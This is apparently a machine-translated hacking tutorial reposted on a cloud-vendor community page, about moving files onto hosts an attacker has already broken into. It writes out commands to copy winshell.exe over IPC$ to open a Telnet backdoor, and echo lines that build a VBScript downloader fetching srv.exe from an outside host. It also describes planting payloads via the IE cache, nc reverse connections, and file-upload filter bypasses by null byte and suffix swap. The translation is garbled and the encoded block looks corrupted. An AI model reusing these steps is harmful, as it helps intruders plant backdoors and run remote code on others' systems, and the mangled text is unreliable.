File upload is a long time ago, the earliest that will be commonly used is the IPC connection, and then a copy, since the dynamic network upfile loophole, A variety of scripting systems, such as php.jsp file vulnerabilities, the principle is very similar, no filtering file upload path, resulting in the bag can be grabbed and then the space 20 to 00, to become null characters, the system is from the right to the left to identify, so to the null character that truncated, more simply filtering file upload type is not complete, change the suffix can be solved No, these uploaded file loopholes, with the universal Upload tool can be easily done, but the vulnerability file name is different.
There are some alternative file upload methods, is in the system done better under the protection of the completion of the source of information to thank Cd-lion to provide one.
Copy a winshell.exe first, open a Telnet port, the command line is always easier than in the browser.
Copy \\myIP\c$\tools\winshell.exe d:\downloads\winzip32 A file has been copied
Start It d:\downloads\winzip32\winshell.exe browser window will stop for a long time,
Not to wait, the program has been started, point stop, and then,
Disconnect shared connection: net use \\myIP\c$/del complete
1 Uploading files using Telnet by:jiangyf@usa.net
If the FTP is closed, SendMail also not, how to compile the file uploaded to the host?
The method is simple:
1. The file to be uploaded is encoded with Uuedcode, and the file will become roughly the following:
Begin 644 File.bat
m.c! J95@T92TP, #503U!=:%=e6#5d9%!>,2q&1d9&1c$l1d9&,2pt4%]j.
M95@T85!9+7@M04%28#!@*CTP, ' 500D]) 04%!049+04] "4$e$34-" 04q%04i-
m3d-"2d%,24%!14u-3d-" 1d5 ' 24=&0t%%3d= ' 1t1 (0t=02$= ' 2da#2$9 1$-!
M1ti (1$-!1t1 ' 4$=.1ti ' 3t= (0t% #3T-/0t] #3T-/0t]!3d%+0t5!07%q<7$@
M "d!%0 ta/($]&1b ' *0t]062 ' E, "Y" 050@+t (@0si<0d%45de2+d-/32 ' o0b ' O
E62 ' *0si<0d%45de2+d-/32 ' *1$5, ($,z7$)!5%9) 4by#3tt@ "@"
`
End
Sum-r/size 17903/262
All of them are visible ASCII characters.
2. Use Telnet to connect to the host and enter
$ cat >a
Then paste the file into the Telnet window with Winodws copy/paste
Press ^d
Generate file A in current directory
3.uudecode A
File recovery, then chmod
3 script is a very good thing, as long as the source code saved to a file can run. So under the shell, use
The Echo statement is written directly into a file and is executed with the appropriate interpreter. Here is a program
Simplification of instances:
echo Set xpost = CreateObject ("Microsoft.XMLHTTP") >167168.vbs
echo Xpost.open "Get", "Http://167168.meibu.com/srv.exe";;, 0 >>167168.vbs
Echo xpost.send () >>167168.vbs
echo Set Sget = CreateObject ("ADODB. Stream ") >>167168.vbs
echo Sget.mode = 3 >>167168.vbs
echo Sget.type = 1 >>167168.vbs
Echo Sget.open () >>167168.vbs
echo sget.write (xpost.responsebody) >>167168.vbs
echo Sget.savetofile "Srv.exe", 2 >>167168.vbs
And then execute the cscript 167168.vbs on it. Which, Http://167168.meibu.com/srv.exe changed to you put
File's Web site path, Srv.exe can be changed to save the file path.
4.start Its:http://167168.meibu.com/ca.rar (see Clearly, watch out for forum automatically tagged)
CD "C:\Documents and Settings\Default user\local settings\temporary Internet files\content.ie5\" (assuming that the system is installed in the C disk, And the current environment is system. If it is a user environment, modify default user to this username)
DIR/S Ca[1].rar
The location of the Ca[1].rar is then displayed, such as C:\Documents and Settings\Default user\local settings\temporary Internet files\ Content.ie5qmvc11h\ca[1].rar
At last:
Copy 0qmvc11h\ca[1].rar C:\winnt\system32\ca.rar
Del 0qmvc11h\ca[1].rar
There can be used Exe2bat conversion batch processing, and then upload, this method is limited to small files, the file is too long to paste error, pass a NC Do reverse connection is a good choice.
Recently I also met a alumni system, only after the registration can upload photos (session), I registered to find can upload any file, but can only resolve the type of image suffix, this situation should be in the server and add a layer of JSP recognized positive, if the local submission can bypass JSP, but did not log in, The first level of session validation will not pass, upload the idea is to change the ASP file into a jpg suffix upload, and then grab the packet, where the packet already contains the session value, and then modify the suffix for ASP, with NC submission, the principle is this, the specific test in progress.
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.